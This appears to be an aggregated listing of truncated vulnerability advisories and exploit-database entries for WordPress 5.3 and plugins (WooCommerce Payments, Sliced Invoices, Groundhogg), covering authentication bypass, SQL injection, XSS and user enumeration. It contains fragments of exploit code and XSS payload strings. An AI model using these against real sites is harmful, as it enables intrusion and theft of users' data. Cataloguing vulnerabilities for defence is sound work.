WooCommerce Payments Plugin for WordPress 5.3.x < 5.3.1 Authentication Bypass

The WooCommerce Payments Plugin installed on the remote host is affected by an authentication bypass vulnerability. Note that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number. No source data...

WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass

Description A JavaScript payload such as "javascript:alert1" in a URL could cause a Cross-Site Scripting XSS vulnerability. According to the commit message see references: "wpksesbadprotocol makes sure to validate that uri attributes don’t contain invalid/or not allowed protocols. While this work...

Wordpress 5.3 - User Disclosure Exploit

Exploit for php platform in category web applications Exploit Title : Wordpress 5.3 - User Disclosure Author: SajjadBnd Software Link: https://wordpress.org/download/ version : wp ' vuln = url + "/wp-json/wp/v2/users/" while True: try: r = requests.getvuln,verify=False content = json.loadsr.text...

WordPress Plugin Sliced Invoices 3.8.2 - post SQL Injection

WordPress Plugin Sliced Invoices 3.8.2 - post SQL Injection Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection Date: 2019-10-22 Exploit Author: Lucian Ioan Nitescu Contact: https://twitter.com/LucianNitescu Webiste: https://nitesculucian.github.io Vendor Homepage:...

WordPress Plugin Sliced Invoices 3.8.2 - &#039;post&#039; SQL Injection

Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection Date: 2019-10-22 Exploit Author: Lucian Ioan Nitescu Contact: https://twitter.com/LucianNitescu Webiste: https://nitesculucian.github.io Vendor Homepage: https://slicedinvoices.com/ Software Link:...

Groundhogg <= 1.3.11.3 - Authenticated SQL Injection

Wordpress Groundhogg plugin with a version lower than 1.3.11.3 is affected by an Authenticated SQL Injection vulnerability. PoC Exploit Title: Wordpress Groundhogg = 1.3.11.13 Authenticated SQL Injection Vulnerability Date: 23-10-2019 Exploit Author: Lucian Ioan Nitescu Contact:...

Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS

Wordpress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting XSS vulnerability. Exploit Title: Wordpress Groundhogg /wp-admin/admin.php?page=ghbulkjobs&action=ghexportcontactsalert1 - The response will contain: bulkaction:...

Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS

Wordpress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting XSS vulnerability. PoC Exploit Title: Wordpress Groundhogg /wp-admin/admin.php?page=ghbulkjobs=ghexportcontacts/ajax', items: bp.getItems, theend: bp.isLastOfThem ,...

Sliced Invoices <= 3.8.2 - Multiple Vulnerabilities

- Unauthenticated information disclosure, allowing attackers to access arbitrary invoices and quotes containing PII - Authenticated SQL injection and information disclosure - Additional issues, such as lack of CSRF and Authorisation checks on AJAX methods used to search invoices. -...